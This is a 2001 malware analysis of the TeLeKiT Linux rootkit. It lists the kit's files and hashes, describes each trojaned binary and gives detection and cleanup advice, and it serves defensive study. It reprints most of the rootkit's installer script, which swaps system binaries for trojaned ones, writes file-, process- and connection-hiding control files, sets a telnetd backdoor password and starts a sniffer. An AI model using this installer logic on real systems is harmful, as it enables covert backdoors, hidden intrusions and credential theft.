Date of Analyse : 28/05/01
Author : Fredrik [ press@alldas.de ]
Description: Linux rootkit ( TeLeKit )

-----[ Disclaimer

Information revealed in this and other analysis are in no way made to contribute illegal actions
such as hacking or other forms of computer crimes. They should serve as informative sources
to prevent actions like mentioned before.

-----[ Introduction

This rootkit was sent to us by an anonymous source. 
We will try to explain in short terms what a rootkit like this does and how you know
if you are infected. The binaries are from the famous linux rootkit (lrk) and the control
files are the default ones used. Pretty stupid.

It seems that the author of this kit is from Romania and that also applies to the "yoyo.tar.gz" rootkit.
Based on the ip-ranges, language used and e-mail addresses I would say that these authors are from Romania.

These are the files that comes with the file TeLeKit (TeLeKiT.tar.gz 413643 bytes) :

fredrik@slaptop:~/analys/TeLeKiT$ ls -al
total 24
drwxr-xr-x   3 fredrik  users        4096 Sep 27  2000 ./
drwxr-xr-x   3 fredrik  users        4096 May 26 11:05 ../
-rwxr-xr-x   1 fredrik  users        4836 Oct 14  2000 TeLe*
-rwxr-xr-x   1 fredrik  users        3664 Oct 14  2000 UnTeLe*
drwxr-xr-x   2 fredrik  users        4096 Oct 14  2000 bin/

fredrik@slaptop:~/analys/TeLeKiT$ ls -al bin
total 1132
drwxr-xr-x   2 fredrik  users        4096 Oct 14  2000 ./
drwxr-xr-x   3 fredrik  users        4096 Sep 27  2000 ../
-rwxr-xr-x   1 fredrik  users       17293 Oct 14  2000 cl*
-rwxr-xr-x   1 fredrik  users      138288 Sep 27  2000 dir*
-rwxr-xr-x   1 fredrik  users      101924 Sep 27  2000 du*
-rwxr-xr-x   1 fredrik  users       52984 Sep 27  2000 find*
-rwxr-xr-x   1 fredrik  users       19840 Sep 27  2000 ifconfig*
-rwxr-xr-x   1 fredrik  users        2443 Oct 14  2000 illusion*
-rwxr-xr-x   1 fredrik  users        9712 Sep 27  2000 killall*
-rwxr-xr-x   1 fredrik  users      138283 Sep 27  2000 ls*
-rwxr-xr-x   1 fredrik  users       30968 Sep 27  2000 netstat*
-rwxr-xr-x   1 fredrik  users       28952 Sep 27  2000 ps*
-rwxr-xr-x   1 fredrik  users       32281 Sep 27  2000 pstree*
-rwxr-xr-x   1 fredrik  users        7229 Sep 27  2000 sniff*
-rwxr-xr-x   1 fredrik  users      235516 Sep 27  2000 syslogd*
-rwxr-xr-x   1 fredrik  users       14140 Sep 27  2000 tcpd*
-rwxr-xr-x   1 fredrik  users       12812 Oct  6  2000 teleulo*
-rwxr-xr-x   1 fredrik  users       48472 Sep 27  2000 telnetd*
-rwxr-xr-x   1 fredrik  users       47604 Sep 27  2000 top*
-rwxr-xr-x   1 fredrik  users       17139 Oct  6  2000 vanish*
-rwxr-xr-x   1 fredrik  users      138289 Sep 27  2000 vdir*

MD5SUM output -

TeLeKiT/
79dfb94a7e8b1b72027cfef891d2d25d  TeLe
fb19c40c2ff6afe3ec8eff767441185d  UnTeLe

TeLEKiT/bin
7629f303efcd7bf6333fdfa2bb499bd7  cl
08e247c82fdda2e871a22bbd2ea2eaeb  dir
19fd6e38a309ac6524d34b39bc114a81  du
e8bc310456a5ba681023175e9ca7d9c8  find
086394958255553f6f38684dad97869e  ifconfig
4b13d54d6136d4c3b0e07465cc2c7cb0  illusion
d550ddeefac00dbcb9c6814d1e7f6778  killall
21545b685113702b96ebe790f86606c1  ls
e55ccb642481597c91e91133f787bcc8  netstat
6956facc98a5a123e2ae625dd79e11ad  ps
fe90f2d978e23e53c393c5130a70fe67  pstree
c3496d9f286968cd94e4fa64d4942b57  sniff
fef94c5c33606142f26e0aabd91e2485  syslogd
9f508129eba684fa40aba537d30a5fe4  tcpd
cee2e00b96eb10a2b0e295be028fb48f  teleulo
b3e7b3556df52aeb5e1442f676f30140  telnetd
62180f6b59b96526a50f2b38ff3ca544  top
224e10a2ca4eb9adc5ee8e168ef675a3  vanish
f0c9c1b1a5927d2aa59b243cec198fc5  vdir

-----[ Main

I will start by displaying the startfile TeLe which obviously installs the rootkit on the compromised machine.
(My own comments in "[ ]")

#!/bin/bash

BINARYDIR="bin"                                 [ where the trojaned binaries are located ]
BACKUP="/usr/man/man3/.../TeLeKiT/backup/"      [ where the backup binaries will be placed ]
LS="/bin/ls"					[ the path to the real binaries ]
DIR="/usr/bin/dir"
VDIR="/usr/bin/vdir"
DU="/usr/bin/du"
FIND="/usr/bin/find"
PS="/bin/ps"
TOP="/usr/bin/top"
PSTREE="/usr/bin/pstree"
IFCONFIG="/sbin/ifconfig"
NETSTAT="/bin/netstat"
KILLALL="/usr/bin/killall"
SYSLOGD="/usr/sbin/syslogd"
SNIFF="/usr/man/man3/.../TeLeKiT/bin/sniff"     [ where to install the sniffer.]
TELNETD="/usr/man/man3/.../TeLeKiT/bin/telnetd" [ where real in.telnetd is stored ]
TELEULO="/usr/man/man3/.../TeLeKiT/bin/teleulo" [ where real /bin/login is stored ]


echo ""
echo "############# TeLeKiT ###############"
echo ""
echo "[*] Coded bY TeLe"                        [ author puts his name on the kit ]
echo "[*] V3rS|on: 1.0 F|n4L Rul3Z!"
echo "[*] R00tKit: lrk6.tar.gz modified by vejeta99" [ lrk based ]
echo "[*] BaCkUP DiR: $BACKUP"
echo ""
echo "############# STARTING ##############"
echo ""

[ I will not include every part of this file as it is very long, this example goes for all the binaries ]

if [ ! -f "$LS" ];
then   
echo "[!] file $LS not 3Xist ... sKipPing"
else
cp $LS $BACKUP					[ backing up the real binary ]
touch -a -m -r $LS $BINARYDIR/ls		[ touch'ing the binary to make it correct date & time ]
cp $BINARYDIR/ls $LS                            [ replacing binary ]
echo "[*] file $LS proc3ssed ... OK"            
fi

cp /usr/man/man3/.../TeLeKiT/bin/illusion /usr/man/man3/.../
cp /usr/man/man3/.../TeLeKiT/bin/cl /usr/man/man3/.../cl

						[ fixing the rootkit files ]

cat > /dev/ptyr << EOF				[ file hiding, will hide all files containing these strings ]
...
rstv
TeLeKiT 
lsniff
tcp.log
ptyr
ptyp
ptyq
hda06
EOF 

echo "[*] file /dev/ptyr proc4ssed ... OK"

cat > /dev/ptyp << EOF			[ process hiding file, hides everything containing *sniff*, *sh*, *in.telnetd ]
3 sniff
3 sh
3 in.telnetd
EOF

echo "[*] file /dev/ptyp proc4ssed ... OK"

cat > /dev/ptyq << EOF			[ netstat hiding, hides connections from/to 202.96 & 213.197 ]
1 202.96
1 213.197
2 202.96
2 213.197
3 213.197
3 202.96
EOF

echo "[*] file /dev/ptyq proc4ssed ... OK"

cat > /dev/hda06 << EOF			[ fixing file for in.telnetd trojan, password seems to be teler0x ]
passwd teler0x
shell /bin/bash
term linux
EOF

echo "[*] file /dev/hda06 proc4ssed ... OK"

if [ ! -f "$SNIFF" ];
then
echo "[!] file $SNIFF not 3Xist ... sKipPing"
else
mkdir /usr/man/man3/.../lsniff			[ installing sniffer ]
cp $SNIFF /usr/man/man3/.../lsniff/
cd /usr/man/man3/.../lsniff/		
./sniff &					[ starting sniffer, this will probably show up in logs ]
echo "[*] file $SNIFF proc4ssed ... OK"
fi 

echo ""
echo "############# ..DONE.. ##############"    
echo ""

						[ end of installation script ]
-----[ File summary

TeLeKiT/                  =>

TeLe                      =         installation script.
UnTeLe                    =         remove rootkit script.

TeLeKiT/bin/              =>
dir/du/find/ls/vdir       =         File hiding trojans, control file is /dev/ptyr.
cl                        =         Utmp/wtmp/lastlog/logfile cleaner.
ifconfig                  =         Ifconfig trojan to hide promiscious mode when sniffing.
illusion                  =         Logcleaner to clean up all logs, uses the cl binary. Made by TeLe.
killall                   =         Trojaned version so applications specified in /dev/ptyp can't be killed.
netstat                   =         Hides all connections/ports specified in /dev/ptyq.
ps/pstree/top             =         Hide processes located in /dev/ptyp.
sniff                     =         Normal linsniffer, stores the log in a file called tcp.log.
syslogd                   =         Trojaned version of syslogd, won't log things specified in /dev/ptys
teleulo                   =         /bin/login replacement to login using a special export DISPLAY password.
telnetd                   =         Trojaned version of telnetd, uses the password teler0x.
tcpd			  =    	    Will bypass hosts.deny for the hosts located in /dev/ptyq.
vanish                    =         Another log cleaner.

-----[ Am I infected ? How do I clean up ?
Q: Am I infected ?

A: If /usr/man/man3/.../TeLeKiT exist on some of your Linux machines your are probably infected.
A good advice is also to strings the binaries such as /bin/ps, /bin/ls, /bin/netstat and check for
pty* patters. 

Example :

fredrik@slaptop:~/analys/TeLeKiT$ strings /bin/ps| grep pty
/dev/ptyp

Q: How do I clean up ?
A: As always when a computer is penetrated a reinstallation is needed. If it's not possible at the time you should be able to
use the cleaning up script that is available here.

-----[ Conclusion 

This rootkit is developed and compiled for Linux.
It's a pretty big kit. It replace many binaries and isn't cleaning up well afterwards.
The most strange thing is that this rootkit doesn't patch any security breaches.
It simply installs itself and leaves all holes open. It's very common in the hacking scene
to close all holes after you've backdoored a computer so no one else can come in, but this kit
doesn't seem to do that. 

Software like tripwire would probably notice any filechanges in time and especially when this rootkit backdoors so many 
binaries.
However, Keep your servers updated with latest patches at every time and hacker
attacks will hopefully not be succefull.

Thank you for reading.

Fredrik Östergren.
press@alldas.de